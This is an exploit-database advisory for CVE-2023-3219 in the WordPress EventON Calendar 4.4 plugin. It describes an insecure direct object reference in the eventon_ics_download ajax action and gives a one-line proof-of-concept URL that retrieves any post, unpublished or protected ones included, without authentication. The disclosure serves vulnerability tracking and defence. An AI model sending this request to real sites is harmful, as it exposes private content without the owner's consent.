WordPress Plugin EventON Calendar 4.4 – Unauthenticated Post Access via IDOR

  • 作者: Miguel Santareno
    日期: 2023-08-04
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51659/
  • # Exploit Title: WordPress Plugin EventON Calendar 4.4 - Unauthenticated Post Access via IDOR
    # Date: 03.08.2023
    # Exploit Author: Miguel Santareno
    # Vendor Homepage: https://www.myeventon.com/
    # Version: 4.4
    # Tested on: Google and Firefox latest version
    # CVE : CVE-2023-3219
    
    # 1. Description
    The plugin does not validate that the event_id parameter in its eventon_ics_download ajax action is a valid Event, allowing unauthenticated visitors to access any Post (including unpublished or protected posts) content via the ics export functionality by providing the numeric id of the post.
    
    
    # 2. Proof of Concept (PoC)
    Proof of Concept:
    https://example.com/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=<any post id>